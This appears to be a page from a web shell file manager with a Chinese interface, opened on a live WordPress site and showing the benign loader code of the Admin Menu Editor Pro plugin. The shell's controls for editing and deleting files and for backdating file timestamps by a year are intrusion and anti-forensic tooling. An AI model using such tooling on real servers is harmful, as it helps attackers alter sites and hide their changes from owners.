文件操作 - menu-editor.php
返回文件管理
返回主菜单
删除本文件
文件: /var/www/vec.uaysen.cl/html/wp-content/plugins/admin-menu-editor-pro/menu-editor.php
编辑文件内容
<?php /* Plugin Name: Admin Menu Editor Pro Plugin URI: http://adminmenueditor.com/ Description: Lets you directly edit the WordPress admin menu. You can re-order, hide or rename existing menus, add custom menus and more. Version: 2.18.1 Author: Janis Elsts Author URI: http://w-shadow.com/ Requires PHP: 5.6 Slug: admin-menu-editor-pro */ if ( include(dirname(__FILE__) . '/includes/version-conflict-check.php') ) { return; } //Load the plugin require_once dirname(__FILE__) . '/includes/basic-dependencies.php'; global $wp_menu_editor; $wp_menu_editor = new WPMenuEditor(__FILE__, 'ws_menu_editor_pro'); //Load Pro version extras $ws_me_extras_file = dirname(__FILE__).'/extras.php'; if ( file_exists($ws_me_extras_file) ){ include $ws_me_extras_file; } if ( defined('AME_TEST_MODE') ) { require dirname(__FILE__) . '/tests/helpers.php'; ameTestUtilities::init(); }
修改文件时间
将文件时间修改为当前时间的前一年
删除文件